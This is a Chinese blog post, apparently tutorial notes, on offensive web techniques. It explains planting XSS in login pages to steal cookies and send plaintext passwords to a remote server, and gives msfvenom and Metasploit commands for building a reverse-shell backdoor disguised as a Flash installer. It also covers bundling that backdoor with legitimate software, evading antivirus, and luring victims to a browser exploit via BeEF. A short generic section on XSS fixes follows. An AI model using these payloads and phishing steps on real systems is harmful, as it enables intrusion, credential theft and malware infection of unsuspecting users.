37、WEB攻防——通用漏洞&XSS跨站&权限维持&捆绑钓鱼&浏览器漏洞


在这里插入图片描述
在这里插入图片描述

要想获取有效的cookie,需要:1、网站本身采用cookie进行验证;2、网站未做http-only等的防御手段。

XSS——后台植入Cookie&表单劫持(获取明文密码)

在这里插入图片描述

  1. 后台植入XSS获取Cookie,主要是在登录成功的文件中写入XSS代码,一旦有人登录成功访问登录成功的代码,就会触发XSS;
  2. 表单劫持,找到将用户名、密码提交给的特定文件,然后在文件中写入XSS,将明文用户名和密码发给远程服务器。
    在这里插入图片描述
  • 后端php代码中的echo都会输出到html页面;html页面中的js代码如<script>会被
    浏览器执行。
  • 表单劫持主要解决网站不使用cookie进行验证;获取明文密码。

XSS——Flash钓鱼配合MSF捆绑上线

条件:Beef上线受控后或直接钓鱼(受害这爱看sese)

  1. 生成后门,msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe > flash.exe
  2. 生成钓鱼网站,立即下载捆绑文件(正常软件+后门文件)
    在这里插入图片描述
    捆绑文件:
    一起压缩两个文件
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

这样就生成了一个捆绑文件。下一步使用资源修改器Restorator更改压缩文件的图标,使得其更加逼真。
在这里插入图片描述
为了更加隐蔽,还需要对后门文件进行免杀处理。

  1. MSF配置监听状态:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0 # 0.0.0.0代表本地任何网卡
set lport 6666
run # 监听
  1. 为什么点击该钓鱼网站:beef受控访问;某种爱好,提示flash版本低,需要安装新版flash。

XSS——浏览器网马配合MSF访问上线

条件:Beef上线受控后&直接钓鱼(浏览器存在0day),这种方式是直接攻击浏览器,生成带有网马的地址。用户一旦访问该网站,直接攻击浏览器,获取主机权限。

  1. 配置MSF生成URL(cve)
use exploit/windows/browser/ms14_064_old_code_execution
set allowpowershellpropmt true
set target 1
run
  1. 诱使受害者访问URL,思路:中了XSS之后,用beef直接跳转到网马网站

若漏洞是针对IE浏览器的,使用IE内核的其他浏览器也可能受该漏洞影响。注意漏洞的利用条件(系统版本、浏览器版本)

  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS跨站脚本漏洞修复是保护网站免受潜在攻击的重要措施。下面是一些常见的修复方法: 1. 输入验证:对于用户输入的数据,进行严格的验证和过滤。使用白名单机制,只允许特定的字符和标签,过滤掉所有潜在的恶意脚本。 2. 输出编码:在将用户输入的数据输出到页面时,进行适当的编码操作,以防止浏览器将其解析为脚本代码。常用的编码方法包括HTML转义、URL编码等。 3. 设置HTTP头:使用安全的标头策略,如X-XSS-Protection、Content-Security-Policy等,以告诉浏览器如何处理潜在的XSS攻击。 4. Cookie安全措施:在设置Cookie时,使用HttpOnly属性,禁止通过脚本访问Cookie信息,从而减少XSS攻击的影响。 5. 安全沙箱:对于用户提供的富文本数据,使用合适的沙箱环境进行处理,限制其执行脚本的能力,确保不会造成恶意代码的注入。 6. 定期更新:保持软件和库的更新,及时修复已知的XSS漏洞。同时关注安全社区的最新消息,及时了解新的修复策略和最佳实践。 7. 高级防护措施:考虑使用Web应用防火墙(WAF)等高级安全工具来检测和阻止潜在的XSS攻击,提供额外的安全保护。 综上所述,修复XSS跨站脚本漏洞需要综合使用输入验证、输出编码、设置HTTP头、Cookie安全措施等多种方法,以加强网站的安全性。同时,定期更新软件和库,并采取高级防护措施有助于最大程度地降低XSS攻击风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值